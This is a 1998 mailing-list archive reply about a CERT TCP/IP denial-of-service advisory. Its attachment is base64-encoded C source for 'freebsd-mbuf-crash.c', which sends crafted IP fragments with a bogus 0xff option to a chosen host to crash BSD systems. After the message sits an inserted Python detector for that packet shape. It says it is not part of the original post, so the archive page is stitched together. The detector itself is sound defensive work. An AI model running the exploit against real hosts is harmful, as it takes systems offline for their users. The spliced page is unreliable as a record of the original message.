Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service

From: Jeff Roberson (jrobersonat_private)
Date: Mon Dec 28 1998 - 15:59:34 PST


    --0-1938059902-914889574=:20814
    Content-Type: TEXT/PLAIN; charset=US-ASCII
    
    Here is some exploit code I wrote a while back.  It hardly ever crashes
    BSD because the conditions required for the bug to work are out of our
    control.
    
    Jeff
    
    On Thu, 24 Dec 1998, Guido van Rooij wrote:
    
    > On Wed, Dec 23, 1998 at 11:17:48AM +0100, Ulf Munkedal wrote:
    > > Have I missed something on the list lately about these illegal packets that
    > > CERT are addressing ("constructing a sequence of packets with certain
    > > characteristics, an intruder can cause vulnerable systems to crash, hang,
    > > or behave in unpredictable ways")?
    > >
    > > Or is this just the old teardrop/newtear/boink/bonk/nestea2 problem that
    > > they are talking about?
    > >
    >
    > No. This is an entirely new problem. It was discovered by me after a bug
    > report for an SMP FreeBSD system. Since I know it is only a matter
    > of time before such a bug would be abused, I decided to inform
    > CERT (also because the problem has been present since at least the
    > BSD Net/2 release). No public exploits are known to me.
    >
    > -Guido
    >
    --0-1938059902-914889574=:20814
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="freebsd-mbuf-crash.c"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.BSI.3.91.981228185934.20814Bat_private>
    Content-Description:
    
    LyogZnJlZWJzZC1tYnVmLWNyYXNoLmMgYnkgSmVmZiBSb2JlcnNvbiwgKGpl
    ZmZyQG53bGluay5jb20pLiBEZWMgMTEgMTk5OC4gDQogKiBJJ20gb25seSBy
    ZWxlYXNpbmcgdGhpcyBhcyBhbiBleGFtcGxlIGJlY2F1c2UgdGhlIGJ1ZyBo
    YXJkbHkgZXZlciByZWxpYWJseSBjcmFzaGVzIGEgbWFjaGluZS4NCiAqLw0K
    DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp
    bmNsdWRlIDxuZXRpbmV0L2lwLmg+DQojZGVmaW5lIF9fRkFWT1JfQlNEDQoj
    aW5jbHVkZSA8bmV0aW5ldC90Y3AuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2lu
    Lmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPGFycGEv
    aW5ldC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3RyaW5n
    cy5oPg0KDQoNCnVfbG9uZyBodG9uYShjaGFyICpob3N0KQ0Kew0KCXVfbG9u
    ZwlhZGRyOw0KCXN0cnVjdAlob3N0ZW50ICpocDsNCg0KCWlmICgoYWRkcj1p
    bmV0X2FkZHIoaG9zdCkpID09IElOQUREUl9OT05FKSB7DQoJCWlmICgoaHAg
    PSBnZXRob3N0YnluYW1lKGhvc3QpKSA9PSBOVUxMKQ0KCQkJcmV0dXJuKC0x
    KTsNCgkJYmNvcHkoaHAtPmhfYWRkcl9saXN0WzBdLCAmYWRkciwgc2l6ZW9m
    KGFkZHIpKTsNCgl9CQ0KCXJldHVybihhZGRyKTsNCn0NCg0KaW50IG1haW4o
    aW50IGFyZ2MsIGNoYXIqIGFyZ3ZbXSkNCnsNCgljaGFyCWJ1ZlsxMjhdOw0K
    CXN0cnVjdAlpcCAqaXBoID0gKHN0cnVjdCBpcCAqKWJ1ZjsJDQoJdV9jaGFy
    CSppcG9wdGlvbnMgPSAodV9jaGFyICopKGJ1ZiArIHNpemVvZihzdHJ1Y3Qg
    aXApKTsNCglzdHJ1Y3QJdGNwaGRyICp0Y3BoID0gKHN0cnVjdCB0Y3BoZHIg
    KikoYnVmICsgNjApOw0KCWludAlzLCBpOw0KCXN0cnVjdAlzb2NrYWRkcl9p
    biBzaW47DQoNCglpZiAoYXJnYyAhPSAyKSB7DQoJCXByaW50ZigidXNhZ2Vc
    blx0JXMgPGhvc3Q+XG4iLCBhcmd2WzBdKTsNCgkJZXhpdCgxKTsNCgl9DQoJ
    cyA9IHNvY2tldChBRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpOw0K
    CWlmIChzIDwgMCkgew0KCQlwZXJyb3IoInNvY2tldCIpOw0KCQlleGl0KDEp
    Ow0KCX0NCglzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc2luLnNpbl9w
    b3J0ID0gaHRvbnMoNyk7DQoJc2luLnNpbl9hZGRyLnNfYWRkciA9IGh0b25h
    KGFyZ3ZbMV0pOw0KCWlmIChzaW4uc2luX2FkZHIuc19hZGRyID09IC0xKSB7
    DQoJCXByaW50ZigiRXJyb3IgcmVzb2x2aW5nICVzXG4iLCBhcmd2WzFdKTsN
    CgkJZXhpdCgxKTsNCgl9DQoNCgliemVybyhidWYsIHNpemVvZihidWYpKTsN
    CglpcGgtPmlwX2hsPTE1Ow0KCWlwaC0+aXBfdj00Ow0KCWlwaC0+aXBfbGVu
    PWh0b25zKDEyNCk7DQoJaXBoLT5pcF9pZD0gaHRvbnMoZ2V0cGlkKCkpOw0K
    CWlwaC0+aXBfb2ZmPSBodG9ucyhJUF9NRik7DQoJaXBoLT5pcF90dGwgPSAy
    NTU7DQoJaXBoLT5pcF9wID0gSVBQUk9UT19UQ1A7DQoJYmNvcHkoJnNpbi5z
    aW5fYWRkci5zX2FkZHIsICZpcGgtPmlwX2RzdCwgc2l6ZW9mKHVfbG9uZykp
    Ow0KCWlwaC0+aXBfc3JjLnNfYWRkciA9IGh0b25hKCIxMC4yLjMuNCIpOw0K
    CWZvciAoaSA9IDA7IGkgPCAyMDtpKyspIHsNCgkJaXBvcHRpb25zW2ldPTB4
    ZmY7DQoJfQ0KCWlwb3B0aW9uc1swXSA9IDB4ZmY7IC8qIE1hZGUgdXAgb3B0
    aW9uICovICANCglpcG9wdGlvbnNbMV0gPSAweDFhOw0KCW1lbXNldCgoY2hh
    ciAqKSZpcG9wdGlvbnNbMl0sIDB4ZmYsIDM3KTsNCglpcG9wdGlvbnNbMzld
    ID0gMTsgIC8qIElQX05PUCAqLw0KCXRjcGgtPnRoX3Nwb3J0ID0gaHRvbnMo
    NTUwNSk7DQoJdGNwaC0+dGhfZHBvcnQgPSBodG9ucygyMyk7DQoJdGNwaC0+
    dGhfc2VxID0gaHRvbmwoMHhhYmNkZTEyMyk7DQoJdGNwaC0+dGhfYWNrID0g
    aHRvbmwoMHgzMjFlZGNiYSk7DQoJdGNwaC0+dGhfZmxhZ3MgPSBUSF9BQ0sg
    fCBUSF9QVVNIOw0KCXRjcGgtPnRoX3dpbiA9IGh0b25zKDB4MTIzNCk7DQoN
    CglpZiAoc2VuZHRvKHMsIGJ1ZiwgMTI0LCAwLCAoc3RydWN0IHNvY2thZGRy
    ICopJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgMTI0KSB7DQoJ
    CXBlcnJvcigic2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlmIChzZW5k
    dG8ocywgYnVmLCAxMjQsIDAsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLCBz
    aXplb2Yoc3RydWN0IHNvY2thZGRyKSkgPCAxMjQpIHsJDQoJCXBlcnJvcigi
    c2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlwaC0+aXBfbGVuID0gaHRv
    bnMoODApOw0KCWlwaC0+aXBfb2ZmID0gaHRvbnMoOCk7DQoJaWYgKHNlbmR0
    byhzLCBidWYsIDgwLCAwLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6
    ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgNjApIHsNCgkJcGVycm9yKCJzZW5k
    dG8iKTsNCgkJZXhpdCgxKTsNCgl9DQoJZXhpdCgwKTsNCn0NCg==
    --0-1938059902-914889574=:20814--
    
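As an added, defensive example (not part of this message or of the attached freebsd-mbuf-crash.c), the following Python parses IPv4 headers and flags the packet shape the attachment builds: a fragment with the MF bit set whose header length is 15 words, i.e. a 40-byte options area holding a made-up option type. The sample packets are constructed inline, not captured; the allow-list of option types and the rule "fragment carrying options is worth an alert" are this example's own assumptions, chosen because that combination is rare in normal traffic and is exactly what the attached code emits.

```python
"""Inspect IPv4 headers for fragments carrying IP options and for option
lists with bogus length fields.  Added defensive example; the sample
packets are constructed here, not taken from any capture."""
import struct

IPOPT_EOL = 0
IPOPT_NOP = 1
# Option types this parser treats as known (RR, TS, SEC, LSRR, SSRR).
# Assumption: a conservative allow-list; anything else is reported.
KNOWN_OPTIONS = {7, 68, 130, 131, 137}


def parse_options(opts: bytes) -> list:
    """Walk an IPv4 option area; return (type, length, problem) tuples."""
    out, i = [], 0
    while i < len(opts):
        t = opts[i]
        if t == IPOPT_EOL:                 # end of list: stop
            out.append((t, 1, None))
            break
        if t == IPOPT_NOP:                 # single-octet option
            out.append((t, 1, None))
            i += 1
            continue
        if i + 1 >= len(opts):             # type present, length missing
            out.append((t, None, "truncated: no length octet"))
            break
        ln = opts[i + 1]
        problem = None
        if ln < 2:
            problem = "length < 2 (would not advance)"
        elif i + ln > len(opts):
            problem = "length overruns option area"
        elif t not in KNOWN_OPTIONS:
            problem = "unknown option type"
        out.append((t, ln, problem))
        if ln < 2:
            break
        i += ln
    return out


def inspect_ipv4(pkt: bytes) -> dict:
    """Parse one IPv4 datagram and report fragmentation/option findings."""
    if len(pkt) < 20:
        raise ValueError("short packet")
    vihl, _tos, _tlen, _ident, off_field, _ttl, _proto, _csum, _src, _dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    version, ihl = vihl >> 4, vihl & 0x0F
    hdr_len = ihl * 4
    if version != 4 or ihl < 5 or hdr_len > len(pkt):
        raise ValueError("bad version or IHL")
    mf = bool(off_field & 0x2000)
    frag_off = (off_field & 0x1FFF) * 8
    opts = pkt[20:hdr_len]                 # options area, if IHL > 5
    findings = parse_options(opts)
    malformed = [f for f in findings if f[2] is not None]
    fragmented = mf or frag_off != 0
    return {
        "fragmented": fragmented,
        "mf": mf,
        "frag_off": frag_off,
        "option_bytes": len(opts),
        "options": findings,
        "malformed_options": malformed,
        # Alert rule (assumption): a fragment that carries an options area,
        # or any option whose length field is bogus.
        "suspicious": (fragmented and len(opts) > 0) or bool(malformed),
    }


def build_sample(ihl: int, off_field: int, options: bytes, payload: bytes) -> bytes:
    """Construct a minimal IPv4 datagram (checksum left zero; sample only)."""
    assert len(options) == (ihl - 5) * 4
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0,
                      ihl * 4 + len(payload), 0x1234, off_field, 64, 6, 0,
                      bytes([10, 2, 3, 4]), bytes([10, 0, 0, 1]))
    return hdr + options + payload


# Constructed samples.  SAMPLE_OPT_FRAG mirrors the attachment's layout:
# IHL 15, MF set, 40 option bytes = type 0xff, length 0x1a, 0xff padding,
# final NOP; 64 bytes of payload gives the same 124-byte total length.
SAMPLE_NORMAL = build_sample(5, 0x4000, b"", b"\x00" * 8)
SAMPLE_PLAIN_FRAG = build_sample(5, 0x2000, b"", b"\x00" * 8)
SAMPLE_OPT_FRAG = build_sample(15, 0x2000,
                               bytes([0xFF, 0x1A]) + b"\xff" * 37 + b"\x01",
                               b"\x00" * 64)

if __name__ == "__main__":
    for name, pkt in [("normal", SAMPLE_NORMAL),
                      ("plain fragment", SAMPLE_PLAIN_FRAG),
                      ("fragment with options", SAMPLE_OPT_FRAG)]:
        r = inspect_ipv4(pkt)
        print(f"{name}: suspicious={r['suspicious']} "
              f"options={r['option_bytes']}B malformed={r['malformed_options']}")
```

The parser deliberately does not trust the option length octet: an option whose declared length runs past the header, or is smaller than two, is what makes a naive in-kernel option walk misbehave, so it is reported rather than silently skipped. Plain fragmentation on its own is not flagged, so the rule stays quiet on ordinary large datagrams.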



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:26:32 PDT